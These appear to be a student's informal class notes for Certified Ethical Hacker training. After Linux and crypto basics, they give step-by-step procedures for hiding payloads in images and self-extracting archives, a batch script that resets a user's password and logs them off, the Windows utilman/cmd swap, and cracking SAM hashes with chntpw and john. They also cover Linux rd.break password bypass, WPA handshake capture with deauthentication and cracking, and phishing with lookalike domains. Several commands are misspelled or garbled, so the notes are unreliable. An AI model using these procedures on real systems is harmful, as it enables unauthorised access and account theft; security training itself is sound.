Add to collection(s) Add to saved
  1. No category
Uploaded by Muhammad Ali khan

CEH Basic Requirements

advertisement 
====================
Requiremets
====================
1- Install Kali Linux
2- Linux Ubuntu/Centos
3- Windows 7
4- Windows 10
Hint [don't install any tool in base machine]
kali.org
download kali linux live insatller/
===============
Linux structure
/etc* = config files
/usr = software, application
/var = logs
/bin = user /sbin = admin commands
/boot = operating system kernel= vmlinuz
=====================
Kali basic commands
sudo pass root [set root password]
mkdr /name of folder
touch = to create the file
cp [source] [destination] = to copy a file mv= to cut and paste a file/folder to new location
rm = to remvoe/delete files
cp -r /folder = to move folder to seek help
mann useradd
useradd -g {name}
"x=" = passwd = to change the password su = to switch the user
"more" = to read the file
cat, less, head, tail, nl., view do the same
/etc/passwd = the list of the user is here
there should be no user with multiple zeros and withour "X"
/etc/shadow = has the password of the users.
vim = file editor
make changes and w q ! in the end to write and quit the file
linux shell = terminal root = zsh shell
normal user shell = sh
you can change the shell, bash is also a shell
r w x = read write execute
each folder is read only for normal user
chmod = to change the permesions
r= read file/folder
w= wirte any file/folder
x= execute the changes
"X" permesion on folder = open
"X" permesion on file = code execution permesion
normal folder permission is r-x
file normal permesion is r--
a+ = all user permesion change
chmod a-r = remove read permesion for all users.
touch = to create a file.
= to run a script = "./[file name]"
$ is used to pass a variable
abc sripts by Deborah shucart
apt-get isntall/list/remove/update/upgrade software name
yum/dnf dpkg -i path/soffware name *.deb [ to install from local]
git clone to get kali tools pkg.org
=======================
Lecture# 2
======================
1- Services
2- Ports
3- SSH
4- Apache
5- CEH Basic wording
7- Cryptography
Encryption/dec
Hash/dehash
encode/decode
8-Stegenonography
Hid obj/.bat/.sh/.exe...behid pic/mp3/software
9- Homophraphy
10- CIA
-------------------
11- Password break/crack
physical access
windows 7/8/10
.rar, .pdf
linux server
Bios
Mobile
---------------------
12- Wireless Password
Phishing [gmail/facebook]
------------------
services
view status of any service
systemctl status/start/stop/enable/disable/restart service-name
- w to check the login users list
** allow/block ssh to root
-PORTS
- port is logical door of service
- remember well know ports i.e ssh, smb, smtp. ntp, dns, DHCP, RDP, FTP, Telnet, - netstat--> to check the state of listening ports.
- netstat -antp ----> to check only tcp ports status
- webserver--> apache/nginx
- cg --list | grep (to check the installed services)
- systemctl start apache2 it will start apache service
-it wll open apache /var/www/html by default
CEH BASIC Wording
- vulnerability
- types of hacker ==> white hat, black hat, gery hat
-------------------------
CRYPTO
-password is alwasy in HASH
- password hash value is cipher
- TEXT to Cipher
ahmad + 2+3number
Ahmad + cjicf@313
ENCCRYPTION/DECRYPTION
-> Used for date transaction (https/mail/msgs/voice)
-> Lenght is not fixed (depends on lenght of data)
-> 2 way method (text to chiper and vice versa)
-> private and public key is used for encryp/decryption
HASH/DEHASH
-> used for password/Dig-Sig
-> hash value will be fixed in lenght
-> 1 way method--> txt-->cipher--> not convertable to text
-> for any .pdf, .rar etc we will break the password by comparing the hashing value
->This is also know are brute force attack.
->
ENCODE/DECODE
-> Used for data (old method)
-> Length is not fixed
-> 2- way only with public key
---------------------------
STEGNOGRAPHY
-> to hide a malacious code behind a pic/file is stegen
-> copy /b mypic.jpeg+date.rar newpic.jpeg
- don't download any stegnet tool from internet.
- for execution og code change to SFX in rar
go to advancens - creating attack file is easy but to hypnotise the people to follow your instruction need 99% effort
- net user --> shows the list of users.
- net user admin password --> changes the password of admin to password
- normal CMD don't have admin control right
- need to run "CMD" as admin and then run this commnad
winrar-->advance-->sfx-->
**IEXPRESS
-script that can show the msg
@echo off
ech "" Hi dear %username% laptop is going off'
net user %username% alikhan
shutdown/L
tsdiscon
-----------------
HOMOGRAPHY
- similarnames user karna...
login.com Iogin.com
faceboo.com facebook.com
gmail.com gamoil.com
- this attack is linked with fake page hosting, phising, social engineering.
**netcraft
--------------
CIA
C--> confidentiality
I--> Integrity (date/email/software....)
A--> availability
touch
--------------
to verify the integrity of file downloaded-->certutil.exe -hashfile [path of file]
c
installed software integrity check-->sfc /SCANNOW
**check email integrity
----------------
WINDOWS PASSWORD BREAK with PHYSICAL ACCESS
-Easy of access
-utillman.exe
copy cmd.exe utillman.exe-->
copy cmd.exe cmd.exe.backup
copy utillman utillman.exe.copy
------------------------
BREAKTHE PASSWORD of windows using Linux
- run kali linux live
- boot it - it will show your windows are remote storage
- attach it
- find its path
- go to its path
- go to sam folder where windows passwords are stored
-use kali tool chntpw
chntpw -l SAM --> check user list
chntpw -u Admin SAM --> change pass of Admin user
-----------------------------
CRACK THE PASSWORD of windows using Linux
-- run kali linux live
- boot it - it will show your windows are remote storage
- attach it
- find its path
- go to its path
- go to sam folder where windows passwords are stored
Tool to read hash vaules-->convert hash to text--> brute force attack
-use kali tool samdump2 --> to read hash value of SAM folder (bkhvie, ophcrack)
ophcrack is also kali tool
open it-->give path of fo SAM-->
it will provide hash values is
- use brute force tool
john, hydra, medusa, broutx
-john john /winhash
----------------
carck password using window
*-openwall.com/john/
-download the tool
-
- convert rar to text as john tool only work on text file
- rarejohn.exe CEH4.rar>ceh4hash.txt
- more ceh4hash.txt show the hash values included in the file
------------------
BREAK PASSWORD OF LINUX
-**netcarft.com
Linux boot process
boot Bios /Bootload /kernal /service -->login secreen
- old emgergency mode = runlevel1 = single mode and now is rd.break
Target = rd.break without password with limited access
--Run machine in rd.break
- press any key during machine startup and stop its boot process
- press "E"
write rd.break in the end of kernel line
- when linux boot in =============
Lec 3
--------------
Linux Password
Booting Seq
1->BIOS Password/PROM = Spare server PROM user/pass boot
2-> Boot loader win = NTLDR , LINUX = Grub [1st process of OS = boot kernerl]
3-> Kernel /boot/
------------
BIOS Password breark
-> boot
-> stop at boot loader stage
-> press "E"
-> edit at kernel startup
-> enter rd.ldr after quit
-> after load please enter mount -o remount,rw /sysroot
-> chroot /sysroot
-> if you do any password break from rd.break sclinux will not let you login on sentos and redhat linus
-> for this stop sclinux
-> /eyc/ssyconfig/sclinux
-> vim -> edit the file
-> press escape--> ;!
-> this is the easy way to break linux password
------------------
* Secure Boot loader to to secure the boot loader editing by password protecting
**rd.break withoutout passs = grub = /boot/grub2/grub.cfg ** kali password break
--------------------
wireless password breaking
->need external card[wireless card with monitoring mode]
--> if not, and want to use laptop adaptor , use kali live in usb to break it
-> install extension pack in virtualbox
-> attach the card with linux vm
-> boot the linux
-> iwconfig --> to view the wireless working mode
means it can be used to connect with any wireless network
-> change the wirelss working mode from working to managed mode
->the packet in which a client pass the password tp AP, it is called 4 ways handshake
-> need to capture the packet containing hash value of password
** aircrack-ng
-> airmon-ng
airodump-ng
airplay-ng
aircrack-ng
airmon-ng check wlan0
step-1 airmong-ng --> to start/stop monitoring mode
step-2 iwconfig --> to verify the working mode of wireles
step-3 airodump-ng (name of your mon wireless)--> to snif the packets
it will give details of srounding wirelss
step-4 airdump-ng --bssid (mention specific bssid) (mention monitor mode wireless)
step-5 airdump-ng --bssid (mention specific bssid) -w/path/file name (to save the file)(mention monitor mode wireless)
step-6 forecefully disconnect the client so they re initiate the 4way handshake
step-7 airplay-ng --> to deauthenticate the connected users of a ssid
airplay-ng --deauth -a (mention the MAC of the AP) -c (mention the MAC of client) (mention the name of wirelss card name)
step-9 stop cap
go to the file path
open .pcap file
step-10 apply the eapol filter in wireshark
step-11 aircrack-ng --> brute force aircrack-ng (file name of cap file) aircrack-ng redpkt-01.pcap -w /usr/share/dict/words
==> if you want to use john tool then convert the pcap file to txt
pcap file cannot be converted to txt file directly
aircrack-ng redpkts -j zhash --> it will convert it with to zhash hccap2john zhash.hccapx > zhash.txt
john zhash.txt Wireless Hacking
Phishing
phishing tools
set
--nexphish -->phishing tool
locate nexphish
github.com
------------------------
ip spoofing
-> tor
Download
advertisement